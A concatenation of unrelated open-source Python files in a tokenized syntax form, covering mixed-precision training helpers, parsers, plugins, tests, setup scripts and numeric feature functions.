enumerate(arg_names)<block_start><if_stmt>arg_name<in>args_to_cast<block_start>new_args.append(cast_tensor_type(args[i] torch.float torch.half))<block_end><else_stmt><block_start>new_args.append(args[i])<block_end><block_end><block_end># convert the kwargs that need to be processed new_kwargs={}<if_stmt>kwargs<block_start><for_stmt>arg_name,arg_value kwargs.items()<block_start><if_stmt>arg_name<in>args_to_cast<block_start>new_kwargs[arg_name]=cast_tensor_type(arg_value torch.float torch.half)<block_end><else_stmt><block_start>new_kwargs[arg_name]=arg_value<block_end><block_end><block_end># apply converted arguments to the decorated method output=old_func(*new_args **new_kwargs)<line_sep># cast the results back to fp32 if necessary <if_stmt>out_fp32<block_start>output=cast_tensor_type(output torch.half torch.float)<block_end><return>output<block_end><return>new_func<block_end><return>auto_fp16_wrapper<block_end><def_stmt>force_fp32 apply_to=<none> out_fp16=<false><block_start>"""Decorator to convert input arguments to fp32 in force. This decorator is useful when you write custom modules and want to support mixed precision training. If there are some inputs that must be processed in fp32 mode, then this decorator can handle it. If inputs arguments are fp16 tensors, they will be converted to fp32 automatically. Arguments other than fp16 tensors are ignored. Args: apply_to (Iterable, optional): The argument names to be converted. `None` indicates all arguments. out_fp16 (bool): Whether to convert the output back to fp16. Example: >>> import torch.nn as nn >>> class MyModule1(nn.Module): >>> >>> # Convert x and y to fp32 >>> @force_fp32() >>> def loss(self, x, y): >>> pass >>> import torch.nn as nn >>> class MyModule2(nn.Module): >>> >>> # convert pred to fp32 >>> @force_fp32(apply_to=('pred', )) >>> def post_process(self, pred, others): >>> pass """<def_stmt>force_fp32_wrapper old_func<block_start>@functools.wraps(old_func)<def_stmt>new_func *args **kwargs# check if the module has set the attribute `fp16_enabled`, if not, # just fallback to the original method. <block_start><if_stmt><not>isinstance(args[0] torch.nn.Module)<block_start><raise>TypeError('@force_fp32 can only be used to decorate the '<concat>'method of nn.Module')<block_end><if_stmt><not>(hasattr(args[0] 'fp16_enabled')<and>args[0].fp16_enabled)<block_start><return>old_func(*args **kwargs)<block_end># get the arg spec of the decorated method args_info=getfullargspec(old_func)<line_sep># get the argument names to be casted args_to_cast=args_info.args<if>apply_to<is><none><else>apply_to<line_sep># convert the args that need to be processed new_args=[]<if_stmt>args<block_start>arg_names=args_info.args[:len(args)]<for_stmt>i,arg_name enumerate(arg_names)<block_start><if_stmt>arg_name<in>args_to_cast<block_start>new_args.append(cast_tensor_type(args[i] torch.half torch.float))<block_end><else_stmt><block_start>new_args.append(args[i])<block_end><block_end><block_end># convert the kwargs that need to be processed new_kwargs=dict()<if_stmt>kwargs<block_start><for_stmt>arg_name,arg_value kwargs.items()<block_start><if_stmt>arg_name<in>args_to_cast<block_start>new_kwargs[arg_name]=cast_tensor_type(arg_value torch.half torch.float)<block_end><else_stmt><block_start>new_kwargs[arg_name]=arg_value<block_end><block_end><block_end># apply converted arguments to the decorated method output=old_func(*new_args **new_kwargs)<line_sep># cast the results back to fp32 if necessary <if_stmt>out_fp16<block_start>output=cast_tensor_type(output torch.float torch.half)<block_end><return>output<block_end><return>new_func<block_end><return>force_fp32_wrapper<block_end><def_stmt>_allreduce_coalesced tensors world_size bucket_size_mb=-1<block_start><if_stmt>bucket_size_mb<g>0<block_start>bucket_size_bytes=bucket_size_mb<times>1024<times>1024<line_sep>buckets=_take_tensors(tensors bucket_size_bytes)<block_end><else_stmt><block_start>buckets=OrderedDict()<for_stmt>tensor tensors<block_start>tp=tensor.type()<if_stmt>tp<not><in>buckets<block_start>buckets[tp]=[]<block_end>buckets[tp].append(tensor)<block_end>buckets=buckets.values()<block_end><for_stmt>bucket buckets<block_start>flat_tensors=_flatten_dense_tensors(bucket)<line_sep>dist.all_reduce(flat_tensors)<line_sep>flat_tensors.div_(world_size)<for_stmt>tensor,synced zip(bucket _unflatten_dense_tensors(flat_tensors bucket))<block_start>tensor.copy_(synced)<block_end><block_end><block_end><def_stmt>allreduce_grads params coalesce=<true> bucket_size_mb=-1<block_start>"""Allreduce gradients. Args: params (list[torch.Parameters]): List of parameters of a model coalesce (bool, optional): Whether allreduce parameters as a whole. Defaults to True. bucket_size_mb (int, optional): Size of bucket, the unit is MB. Defaults to -1. """<line_sep>grads=[param.grad.data<for>param params<if>param.requires_grad<and>param.grad<is><not><none>]<line_sep>world_size=dist.get_world_size()<if_stmt>coalesce<block_start>_allreduce_coalesced(grads world_size bucket_size_mb)<block_end><else_stmt><block_start><for_stmt>tensor grads<block_start>dist.all_reduce(tensor.div_(world_size))<block_end><block_end><block_end><def_stmt>wrap_fp16_model model<block_start>"""Wrap the FP32 model to FP16. 1. Convert FP32 model to FP16. 2. Remain some necessary layers to be FP32, e.g., normalization layers. Args: model (nn.Module): Model in FP32. """<line_sep># convert model to fp16 model.half()<line_sep># patch the normalization layers to make it work in fp32 mode patch_norm_fp32(model)<line_sep># set `fp16_enabled` flag <for_stmt>m model.modules()<block_start><if_stmt>hasattr(m 'fp16_enabled')<block_start>m.fp16_enabled=<true><block_end><block_end><block_end><def_stmt>patch_norm_fp32 module<block_start>"""Recursively convert normalization layers from FP16 to FP32. Args: module (nn.Module): The modules to be converted in FP16. Returns: nn.Module: The converted module, the normalization layers have been converted to FP32. """<if_stmt>isinstance(module (nn.modules.batchnorm._BatchNorm nn.GroupNorm))<block_start>module.float()<if_stmt>isinstance(module nn.GroupNorm)<or>torch.__version__<l>'1.3'<block_start>module.forward=patch_forward_method(module.forward torch.half torch.float)<block_end><block_end><for_stmt>child module.children()<block_start>patch_norm_fp32(child)<block_end><return>module<block_end><def_stmt>patch_forward_method func src_type dst_type convert_output=<true><block_start>"""Patch the forward method of a module. Args: func (callable): The original forward method. src_type (torch.dtype): Type of input arguments to be converted from. dst_type (torch.dtype): Type of input arguments to be converted to. convert_output (bool): Whether to convert the output back to src_type. Returns: callable: The patched forward method. """<def_stmt>new_forward *args **kwargs<block_start>output=func(*cast_tensor_type(args src_type dst_type) **cast_tensor_type(kwargs src_type dst_type))<if_stmt>convert_output<block_start>output=cast_tensor_type(output dst_type src_type)<block_end><return>output<block_end><return>new_forward<block_end>
""" Google Cloud Emulators ====================== Allows to spin up google cloud emulators, such as PubSub. """<import_from_stmt>.pubsub PubSubContainer# noqa
# coding: utf-8 """ Module `chatette.parsing.lexing.rule_arg_decl` Contains the definition of the class that represents the lexing rule to tokenize the declaration of an argument in a unit declaration. """<import_from_stmt>chatette.parsing.lexing.lexing_rule LexingRule<import_from_stmt>chatette.parsing.lexing LexicalToken TerminalType<import_from_stmt>chatette.parsing.utils ARG_SYM extract_identifier<class_stmt>RuleArgDecl(LexingRule)<block_start><def_stmt>_apply_strategy self **kwargs<block_start><if_stmt><not>self._text.startswith(ARG_SYM self._next_index)<block_start>self.error_msg="Invalid token. Expected an argument declaration there "+"(starting with '"+ARG_SYM+"')."<line_sep><return><false><block_end>self._next_index<augadd>1<line_sep>self._update_furthest_matched_index()<line_sep>self._tokens.append(LexicalToken(TerminalType.arg_marker ARG_SYM))<line_sep>arg_name=extract_identifier(self._text self._next_index)<if_stmt>arg_name<is><none><block_start>self.error_msg="Didn't expect the line to end there. Expected an argument name."<line_sep><return><false><block_end><elif_stmt>len(arg_name)<eq>0<block_start>self.error_msg="Couldn't extract the argument name. Arguments must have a name."<line_sep><return><false><block_end>self._next_index<augadd>len(arg_name)<line_sep>self._update_furthest_matched_index()<line_sep>self._tokens.append(LexicalToken(TerminalType.arg_name arg_name))<line_sep><return><true><block_end><block_end>
# -*- coding: utf-8 -*- <import_stmt>ckan.plugins<as>p<def_stmt>x2 sender<block_start><return>sender<times>2<block_end><def_stmt>x10 sender<block_start><return>sender<times>10<block_end><class_stmt>ExampleISignalPlugin(p.SingletonPlugin)<block_start>p.implements(p.ISignal)<line_sep># ISignal <def_stmt>get_signal_subscriptions self<block_start><return>{p.toolkit.signals.ckanext.signal(u'isignal_number'):[x2 {u'receiver':x10 u'sender':10}]}<block_end><block_end>
<import_from_stmt>typing Dict Optional Text List<import_stmt>apache_beam<as>beam<import_stmt>tensorflow_model_analysis<as>tfma<import_from_stmt>tensorflow_model_analysis config<import_from_stmt>tensorflow_model_analysis constants<import_from_stmt>tensorflow_model_analysis model_util<import_from_stmt>tensorflow_model_analysis types<import_from_stmt>tensorflow_model_analysis.extractors extractor<import_from_stmt>tfx_bsl.tfxio tensor_adapter<line_sep>BATCHED_PREDICT_EXTRACTOR_STAGE_NAME='ExtractBatchPredictions'<def_stmt>custom_extractors eval_config eval_shared_model tensor_adapter_config<arrow>List[tfma.extractors.Extractor]<block_start><return>tfma.default_extractors(eval_config=eval_config eval_shared_model=eval_shared_model tensor_adapter_config=tensor_adapter_config custom_predict_extractor=BatchedPredictExtractor(eval_config eval_shared_model tensor_adapter_config))<block_end><def_stmt>BatchedPredictExtractor eval_config:config.EvalConfig eval_shared_model:types.MaybeMultipleEvalSharedModels tensor_adapter_config:Optional[tensor_adapter.TensorAdapterConfig]=<none> <arrow>extractor.Extractor<block_start>eval_shared_models=model_util.verify_and_update_eval_shared_models(eval_shared_model)<line_sep><return>extractor.Extractor(stage_name=BATCHED_PREDICT_EXTRACTOR_STAGE_NAME ptransform=_ExtractBatchedPredictions(eval_config=eval_config eval_shared_models={m.model_name:m<for>m eval_shared_models} tensor_adapter_config=tensor_adapter_config))<block_end>@beam.ptransform_fn@beam.typehints.with_input_types(types.Extracts)@beam.typehints.with_output_types(types.Extracts)<def_stmt>_ExtractBatchedPredictions extracts:beam.pvalue.PCollection eval_config:config.EvalConfig eval_shared_models:Dict[Text types.EvalSharedModel] tensor_adapter_config:Optional[tensor_adapter.TensorAdapterConfig]=<none> <arrow>beam.pvalue.PCollection<block_start>signature_names={}<for_stmt>spec eval_config.model_specs<block_start>model_name=''<if>len(eval_config.model_specs)<eq>1<else>spec.name<line_sep>signature_names[model_name]=[spec.signature_name]<block_end><return>(extracts|'Predict'<rshift>beam.ParDo(model_util.ModelSignaturesDoFn(eval_config=eval_config eval_shared_models=eval_shared_models signature_names={constants.PREDICTIONS_KEY:signature_names} prefer_dict_outputs=<true> tensor_adapter_config=tensor_adapter_config)))<block_end>
<import_from_stmt>unittest TestCase<import_from_stmt>LongestSubstringWithoutRepeatingCharacters LongestSubstringWithoutRepeatingCharacters<class_stmt>TestLongestSubstringWithoutRepeatingCharacters(TestCase)<block_start><def_stmt>test_lengthOfLongestSubstring self<block_start>lswrc=LongestSubstringWithoutRepeatingCharacters()<line_sep># Expected: wke, 3 self.assertTrue(lswrc.lengthOfLongestSubstring("pwwkew")<eq>3)<line_sep># Expected: b, 1 self.assertTrue(lswrc.lengthOfLongestSubstring("bbbbb")<eq>1)<line_sep># Expected: abc, 3 self.assertTrue(lswrc.lengthOfLongestSubstring("abcabcbb")<eq>3)<line_sep># Expected: vdf, 3 self.assertTrue(lswrc.lengthOfLongestSubstring("dvdf")<eq>3)<block_end><block_end>
# # Copyright Soramitsu Co., Ltd. All Rights Reserved. # SPDX-License-Identifier: Apache-2.0 # <import_from_stmt>iroha Iroha IrohaCrypto<import_from_stmt>iroha primitive_pb2<import_stmt>commons<line_sep>admin=commons.new_user('admin@test')<line_sep>alice=commons.new_user('alice@test')<line_sep>iroha=Iroha(admin['id'])<line_sep>@commons.hex<def_stmt>genesis_tx <block_start>test_permissions=[primitive_pb2.can_detach_role]<line_sep>genesis_commands=commons.genesis_block(admin alice test_permissions)<line_sep>tx=iroha.transaction(genesis_commands)<line_sep>IrohaCrypto.sign_transaction(tx admin['key'])<line_sep><return>tx<block_end>@commons.hex<def_stmt>detach_role_tx <block_start>tx=iroha.transaction([iroha.command('DetachRole' account_id=admin['id'] role_name='test_role')] creator_account=alice['id'])<line_sep>IrohaCrypto.sign_transaction(tx alice['key'])<line_sep><return>tx<block_end>
#encoding: utf-8 """Tornado handlers for the terminal emulator."""<line_sep># Copyright (c) Jupyter Development Team. # Distributed under the terms of the Modified BSD License. <import_from_stmt>tornado web<import_stmt>terminado<import_from_stmt>notebook._tz utcnow<import_from_stmt>..base.handlers IPythonHandler<import_from_stmt>..base.zmqhandlers WebSocketMixin<class_stmt>TerminalHandler(IPythonHandler)<block_start>"""Render the terminal interface."""<line_sep>@web.authenticated<def_stmt>get self term_name<block_start>self.write(self.render_template('terminal.html' ws_path="terminals/websocket/%s"%term_name))<block_end><block_end><class_stmt>TermSocket(WebSocketMixin IPythonHandler terminado.TermSocket)<block_start><def_stmt>origin_check self<block_start>"""Terminado adds redundant origin_check Tornado already calls check_origin, so don't do anything here. """<line_sep><return><true><block_end><def_stmt>get self *args **kwargs<block_start><if_stmt><not>self.get_current_user()<block_start><raise>web.HTTPError(403)<block_end><return>super(TermSocket self).get(*args **kwargs)<block_end><def_stmt>on_message self message<block_start>super(TermSocket self).on_message(message)<line_sep>self.application.settings['terminal_last_activity']=utcnow()<block_end><def_stmt>write_message self message binary=<false><block_start>super(TermSocket self).write_message(message binary=binary)<line_sep>self.application.settings['terminal_last_activity']=utcnow()<block_end><block_end>
# -*- coding: utf-8 -*- # # Copyright (c) 2020, the cclib development team # # This file is part of cclib (http://cclib.github.io) and is distributed under # the terms of the BSD 3-Clause License. """Bridge for using cclib data in PyQuante (http://pyquante.sourceforge.net)."""<import_stmt>numpy<import_from_stmt>cclib.parser.utils find_package<class_stmt>MissingAttributeError(Exception)<block_start><pass><block_end>_found_pyquante2=find_package("pyquante2")<if_stmt>_found_pyquante2<block_start><import_from_stmt>pyquante2 molecule<block_end><def_stmt>_check_pyquante <block_start><if_stmt><not>_found_pyquante2<block_start><raise>ImportError("You must install `pyquante2` to use this function")<block_end><block_end><def_stmt>makepyquante data<block_start>"""Create a PyQuante Molecule from ccData object."""<line_sep>_check_pyquante()<line_sep># Check required attributes. required_attrs={"atomcoords" "atomnos"}<line_sep>missing=[x<for>x required_attrs<if><not>hasattr(data x)]<if_stmt>missing<block_start>missing=" ".join(missing)<line_sep><raise>MissingAttributeError("Could not create pyquante molecule due to missing attribute: {}".format(missing))<block_end># In pyquante2, molecular geometry is specified in a format of: # [(3,.0000000000, .0000000000, .0000000000), (1, .0000000000, .0000000000,1.629912)] moldesc=numpy.insert(data.atomcoords[-1] 0 data.atomnos 1).tolist()<line_sep><return>molecule([tuple(x)<for>x moldesc] units="Angstroms" charge=data.charge multiplicity=data.mult )<block_end><del_stmt>find_package<line_sep>
# -*- coding: utf-8 -*- <import_from_future_stmt> unicode_literals<import_stmt>itertools<import_from_stmt>copy copy<import_from_stmt>typing Any<import_from_stmt>typing Optional<import_from_stmt>typing Tuple<import_from_stmt>typing Type<import_from_stmt>._compat PY2<import_from_stmt>._compat unicode<import_from_stmt>.exceptions ParseError<import_from_stmt>.exceptions UnexpectedCharError<import_from_stmt>.exceptions UnexpectedEofError<import_from_stmt>.toml_char TOMLChar<class_stmt>_State<block_start><def_stmt>__init__ self source save_marker=<false> restore=<false># type: (_Source, Optional[bool], Optional[bool]) -> None <block_start>self._source=source<line_sep>self._save_marker=save_marker<line_sep>self.restore=restore<block_end><def_stmt>__enter__ self# type: () -> None # Entering this context manager - save the state <block_start><if_stmt>PY2# Python 2.7 does not allow to directly copy # an iterator, so we have to make tees of the original # chars iterator. <block_start>self._source._chars,self._chars=itertools.tee(self._source._chars)<block_end><else_stmt><block_start>self._chars=copy(self._source._chars)<block_end>self._idx=self._source._idx<line_sep>self._current=self._source._current<line_sep>self._marker=self._source._marker<line_sep><return>self<block_end><def_stmt>__exit__ self exception_type exception_val trace# Exiting this context manager - restore the prior state <block_start><if_stmt>self.restore<or>exception_type<block_start>self._source._chars=self._chars<line_sep>self._source._idx=self._idx<line_sep>self._source._current=self._current<if_stmt>self._save_marker<block_start>self._source._marker=self._marker<block_end><block_end><block_end><block_end><class_stmt>_StateHandler<block_start>""" State preserver for the Parser. """<def_stmt>__init__ self source# type: (Source) -> None <block_start>self._source=source<line_sep>self._states=[]<block_end><def_stmt>__call__ self *args **kwargs<block_start><return>_State(self._source *args **kwargs)<block_end><def_stmt>__enter__ self# type: () -> None <block_start>state=self()<line_sep>self._states.append(state)<line_sep><return>state.__enter__()<block_end><def_stmt>__exit__ self exception_type exception_val trace<block_start>state=self._states.pop()<line_sep><return>state.__exit__(exception_type exception_val trace)<block_end><block_end><class_stmt>Source(unicode)<block_start>EOF=TOMLChar("\0")<def_stmt>__init__ self _# type: (unicode) -> None <block_start>super(Source self).__init__()<line_sep># Collection of TOMLChars self._chars=iter([(i TOMLChar(c))<for>i,c enumerate(self)])<line_sep>self._idx=0<line_sep>self._marker=0<line_sep>self._current=TOMLChar("")<line_sep>self._state=_StateHandler(self)<line_sep>self.inc()<block_end><def_stmt>reset self# initialize both idx and current <block_start>self.inc()<line_sep># reset marker self.mark()<block_end>@property<def_stmt>state self# type: () -> _StateHandler <block_start><return>self._state<block_end>@property<def_stmt>idx self# type: () -> int <block_start><return>self._idx<block_end>@property<def_stmt>current self# type: () -> TOMLChar <block_start><return>self._current<block_end>@property<def_stmt>marker self# type: () -> int <block_start><return>self._marker<block_end><def_stmt>extract self# type: () -> unicode <block_start>""" Extracts the value between marker and index """<line_sep><return>self[self._marker:self._idx]<block_end><def_stmt>inc self exception=<none># type: (Optional[Type[ParseError]]) -> bool <block_start>""" Increments the parser if the end of the input has not been reached. Returns whether or not it was able to advance. """<try_stmt><block_start>self._idx,self._current=next(self._chars)<line_sep><return><true><block_end><except_stmt>StopIteration<block_start>self._idx=len(self)<line_sep>self._current=self.EOF<if_stmt>exception<block_start><raise>self.parse_error(exception)<block_end><return><false><block_end><block_end><def_stmt>inc_n self n exception=<none># type: (int, Exception) -> bool <block_start>""" Increments the parser by n characters if the end of the input has not been reached. """<for_stmt>_ range(n)<block_start><if_stmt><not>self.inc(exception=exception)<block_start><return><false><block_end><block_end><return><true><block_end><def_stmt>consume self chars min=0 max=-1<block_start>""" Consume chars until min/max is satisfied is valid. """<while_stmt>self.current<in>chars<and>max<ne>0<block_start>min<augsub>1<line_sep>max<augsub>1<if_stmt><not>self.inc()<block_start><break><block_end><block_end># failed to consume minimum number of characters <if_stmt>min<g>0<block_start>self.parse_error(UnexpectedCharError)<block_end><block_end><def_stmt>end self# type: () -> bool <block_start>""" Returns True if the parser has reached the end of the input. """<line_sep><return>self._current<is>self.EOF<block_end><def_stmt>mark self# type: () -> None <block_start>""" Sets the marker to the index's current position """<line_sep>self._marker=self._idx<block_end><def_stmt>parse_error self exception=ParseError *args# type: (Type[ParseError], Any) -> ParseError <block_start>""" Creates a generic "parse error" at the current position. """<line_sep>line,col=self._to_linecol()<line_sep><return>exception(line col *args)<block_end><def_stmt>_to_linecol self# type: () -> Tuple[int, int] <block_start>cur=0<for_stmt>i,line enumerate(self.splitlines())<block_start><if_stmt>cur+len(line)+1<g>self.idx<block_start><return>(i+1 self.idx-cur)<block_end>cur<augadd>len(line)+1<block_end><return>len(self.splitlines()) 0<block_end><block_end>
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<import_from_stmt>.cond_bn ConditionalBatchNorm1d<line_sep># adopted Generator ResBlock from https://arxiv.org/abs/1909.11646 <class_stmt>GBlock(nn.Module)<block_start><def_stmt>__init__ self in_channels out_channels condition_dim<block_start>super().__init__()<line_sep>self.cond_bn=nn.ModuleList([ConditionalBatchNorm1d(in_channels<if>i<eq>0<else>out_channels condition_dim)<for>i range(4)])<line_sep>self.leaky_relu=nn.LeakyReLU(0.2)<line_sep>self.cnn=nn.ModuleList([nn.Conv1d(in_channels<if>i<eq>0<else>out_channels out_channels kernel_size=3 dilation=2<power>i padding=2<power>i)<for>i range(4)])<line_sep>self.shortcut=nn.Conv1d(in_channels out_channels kernel_size=1)<block_end><def_stmt>forward self x z mask=<none><block_start>identity=x<line_sep>x=self.cnn[0](self.leaky_relu(self.cond_bn[0](x z)))<if_stmt>mask<is><not><none><block_start>x.masked_fill_(mask 0.0)<block_end>x=self.cnn[1](self.leaky_relu(self.cond_bn[1](x z)))<if_stmt>mask<is><not><none><block_start>x.masked_fill_(mask 0.0)<block_end>x=x+self.shortcut(identity)<if_stmt>mask<is><not><none><block_start>x.masked_fill_(mask 0.0)<block_end>identity=x<line_sep>x=self.cnn[2](self.leaky_relu(self.cond_bn[2](x z)))<if_stmt>mask<is><not><none><block_start>x.masked_fill_(mask 0.0)<block_end>x=self.cnn[3](self.leaky_relu(self.cond_bn[3](x z)))<if_stmt>mask<is><not><none><block_start>x.masked_fill_(mask 0.0)<block_end>x=x+identity<line_sep><return>x<block_end><block_end><class_stmt>VCDecoder(nn.Module)<block_start><def_stmt>__init__ self hp<block_start>super().__init__()<line_sep>self.stem=nn.Conv1d(hp.chn.encoder+hp.chn.residual_out hp.chn.gblock[0] kernel_size=7 padding=3)<line_sep>self.gblock=nn.ModuleList([GBlock(in_channels out_channels hp.chn.speaker.token)<for>in_channels,out_channels zip(list(hp.chn.gblock)[:-1] hp.chn.gblock[1:])])<line_sep>self.final=nn.Conv1d(hp.chn.gblock[-1] hp.audio.n_mel_channels kernel_size=1)<block_end><def_stmt>forward self x speaker_emb mask=<none># x: linguistic features + pitch info. # [B, chn.encoder + chn.residual_out, T_dec] <block_start>x=self.stem(x)# [B, chn.gblock[0], T] <if_stmt>mask<is><not><none><block_start>x.masked_fill_(mask 0.0)<block_end><for_stmt>gblock self.gblock<block_start>x=gblock(x speaker_emb mask)<block_end># x: [B, chn.gblock[-1], T] x=self.final(x)# [B, M, T] <if_stmt>mask<is><not><none><block_start>x.masked_fill_(mask 0.0)<block_end><return>x<block_end><block_end>
<import_from_stmt>setuptools setup find_packages<import_from_stmt>setuptools.command.install install<import_stmt>os<import_stmt>setuptools<import_stmt>sys<line_sep># should match codalab/common.py#CODALAB_VERSION CODALAB_VERSION="1.1.4"<class_stmt>Install(install)<block_start>_WARNING_TEMPLATE=('\n\n\033[1m\033[93mWarning! CodaLab was installed at {}, which is not\n'<concat>'one of the following paths in $PATH:\n\n{}\n\nConsider adding {} to $PATH\n'<concat>'to use the CodaLab CLI. You can do this by {}\033[0m\n\n')<line_sep>_UNIX_FIX='appending the following line to your .bashrc:\nexport PATH="$PATH:{}"'<line_sep>_WINDOWS_FIX=('by selecting System from the Control Panel, selecting Advanced system\n'<concat>'settings, clicking Environment Variables and adding {} to the list.')<line_sep>_WINDOWS_PLATFORM_VALUES={'win32' 'cygwin'}<line_sep>@staticmethod<def_stmt>_build_fix_message installed_path<block_start><return>(Install._WINDOWS_FIX.format(installed_path)<if>sys.platform<in>Install._WINDOWS_PLATFORM_VALUES<else>Install._UNIX_FIX.format(installed_path))<block_end><def_stmt>run self<block_start>install.run(self)<line_sep>self._check_path()<block_end><def_stmt>_check_path self<block_start>cl_path=self.install_scripts<line_sep>executable_paths=os.environ['PATH'].split(os.pathsep)<if_stmt>cl_path<not><in>executable_paths# Prints a yellow, bold warning message in regards to the installation path not in $PATH <block_start>print(Install._WARNING_TEMPLATE.format(cl_path '\n'.join(executable_paths) cl_path Install._build_fix_message(cl_path) ))<block_end><block_end><block_end><def_stmt>get_requirements *requirements_file_paths<block_start>requirements=[]<for_stmt>requirements_file_path requirements_file_paths<block_start><with_stmt>open(requirements_file_path)<as>requirements_file<block_start><for_stmt>line requirements_file<block_start><if_stmt>line[0:2]<ne>'-r'<block_start>requirements.append(line.strip())<block_end><block_end><block_end><block_end><return>requirements<block_end><if_stmt>int(setuptools.__version__.split('.')[0])<l>25<block_start>print("WARNING: Please upgrade setuptools to a newer version, otherwise installation may break. "<concat>"Recommended command: `pip3 install -U setuptools`")<block_end>setup(name='codalab' version=CODALAB_VERSION description='CLI for CodaLab, a platform for reproducible computation' long_description=('Visit https://worksheets.codalab.org/ or setup your own server by following the '<concat>'instructions in the documentation (https://codalab-worksheets.readthedocs.io/en/latest/Server-Setup).') url='https://github.com/codalab/codalab-worksheets' author='CodaLab' author_email='<EMAIL>' license='Apache License 2.0' keywords='codalab reproducible computation worksheets competitions' packages=find_packages(exclude=["tests*"]) classifiers=["Programming Language :: Python :: 3 :: Only" "Programming Language :: Python :: 3.6" "License :: OSI Approved :: Apache Software License" ] py_modules=['codalab_service'] python_requires='~=3.6' cmdclass={'install':Install} include_package_data=<true> install_requires=get_requirements('requirements.txt') entry_points={'console_scripts':['cl=codalab.bin.cl:main' 'cl-server=codalab.bin.server:main' 'cl-bundle-manager=codalab.bin.bundle_manager:main' 'codalab-service=codalab_service:main' 'cl-worker=codalab.worker.main:main' 'cl-worker-manager=codalab.worker_manager.main:main' 'cl-competitiond=scripts.competitiond:main' ]} zip_safe=<false> )<line_sep>
# Function: Relu and normalization # Comments: offset defined during design phase (not runtime) <import_stmt>pyrtl<line_sep># relu and normalization <def_stmt>relu_nrml din offset=0<block_start><assert_stmt>len(din)<eq>32<block_end><assert_stmt>offset<le>24<line_sep>dout=pyrtl.WireVector(32)<with_stmt>pyrtl.conditional_assignment<block_start><with_stmt>din[-1]<eq>0<block_start>dout<augor>din<block_end><with_stmt>pyrtl.otherwise<block_start>dout<augor>0<block_end><block_end><return>dout[24-offset:32-offset]<line_sep># Test: collects only the 8 LSBs (after relu) relu_in=pyrtl.Register(bitwidth=32 name='din')<line_sep>relu_in.next<auglshift>300<line_sep>offset=24<line_sep>dout=relu_nrml(relu_in offset)<line_sep>relu_out=pyrtl.Register(bitwidth=8 name='dout')<line_sep>relu_out.next<auglshift>dout<line_sep># simulate the instantiated design for 15 cycles sim_trace=pyrtl.SimulationTrace()<line_sep>sim=pyrtl.Simulation(tracer=sim_trace)<for_stmt>cyle range(35)<block_start>sim.step({})<block_end>sim_trace.render_trace()<line_sep>
""" Testing for the spaghetti api import structure. """<import_stmt>unittest<import_from_stmt>.network_unittest_classes TestNetwork<import_from_stmt>.network_unittest_classes TestNetworkPointPattern<import_from_stmt>.network_unittest_classes TestNetworkAnalysis<line_sep># api import structure <import_stmt>spaghetti<line_sep># run tests on spaghetti.network.Network TestNetwork.spaghetti=spaghetti<line_sep>TestNetwork()<line_sep># run tests on spaghetti.network.PointPattern TestNetworkPointPattern.spaghetti=spaghetti<line_sep>TestNetworkPointPattern()<line_sep># run tests on spaghetti.analysis TestNetworkAnalysis.spaghetti=spaghetti<line_sep>TestNetworkAnalysis()<if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
<import_from_stmt>optparse make_option<import_from_stmt>django.core.management.base AppCommand<import_from_stmt>django.core.management.sql sql_custom<import_from_stmt>django.db connections DEFAULT_DB_ALIAS<class_stmt>Command(AppCommand)<block_start>help="Prints the custom table modifying SQL statements for the given app name(s)."<line_sep>option_list=AppCommand.option_list+(make_option('--database' action='store' dest='database' default=DEFAULT_DB_ALIAS help='Nominates a database to print the '<concat>'SQL for. Defaults to the "default" database.') )<line_sep>output_transaction=<true><def_stmt>handle_app self app **options<block_start><return>u'\n'.join(sql_custom(app self.style connections[options.get('database')])).encode('utf-8')<block_end><block_end>
<import_stmt>sys<import_stmt>chardet<line_sep>fin=open(sys.argv[1] "rb")<line_sep>fout=open(sys.argv[2] "w")<for_stmt>line fin<block_start><try_stmt><block_start>line=line.decode("utf-8")<block_end><except_stmt>Exception<block_start>line=line.decode(chardet.detect(line)["encoding"])<block_end>data=line.strip().split()<line_sep>text=" ".join(data[1:])<line_sep>label=data[0].split(":")[0]<line_sep>fout.write("{}\t{}\n".format(text label))<block_end>
<import_stmt>numpy<as>np<import_from_stmt>scipy stats<def_stmt>max_slope t x<block_start>"""Compute the largest rate of change in the observed data."""<line_sep>slopes=np.diff(x)/np.diff(t)<line_sep><return>np.max(np.abs(slopes))<block_end><def_stmt>maximum x<block_start>"""Maximum observed value."""<line_sep><return>np.max(x)<block_end><def_stmt>median x<block_start>"""Median of observed values."""<line_sep><return>np.median(x)<block_end><def_stmt>median_absolute_deviation x<block_start>"""Median absolute deviation (from the median) of the observed values."""<line_sep><return>np.median(np.abs(x-np.median(x)))<block_end><def_stmt>minimum x<block_start>"""Minimum observed value."""<line_sep><return>np.min(x)<block_end><def_stmt>percent_beyond_1_std x e<block_start>"""Percentage of values more than 1 std. dev. from the weighted average."""<line_sep>dists_from_mu=x-weighted_average(x e)<line_sep><return>np.mean(np.abs(dists_from_mu)<g>weighted_std_dev(x e))<block_end><def_stmt>percent_close_to_median x window_frac=0.1<block_start>"""Percentage of values within window_frac*(max(x)-min(x)) of median."""<line_sep>window=(x.max()-x.min())<times>window_frac<line_sep><return>np.mean(np.abs(x-np.median(x))<l>window)<block_end><def_stmt>skew x<block_start>"""Skewness of a dataset. Approximately 0 for Gaussian data."""<line_sep><return>stats.skew(x)<block_end><def_stmt>std x<block_start>"""Standard deviation of observed values."""<line_sep><return>np.std(x)<block_end><def_stmt>weighted_average x e<block_start>"""Arithmetic mean of observed values, weighted by measurement errors."""<line_sep><return>np.average(x weights=1./(e<power>2))<block_end><def_stmt>weighted_average_std_err x e<block_start>""" Standard deviation of the sample weighted average of values x with measurement errors e. Note: this is not the same as the weighted sample standard deviation; this value only quantifies the measurement errors, not the dispersion of the data. """<line_sep><return>np.sqrt(1.0/np.sum(e<power>2))<block_end><def_stmt>weighted_std_dev x e<block_start>"""Standard deviation of observed values, weighted by measurement errors."""<line_sep><return>np.sqrt(np.average((x-weighted_average(x e))<power>2 weights=1./(e<power>2)))<block_end>
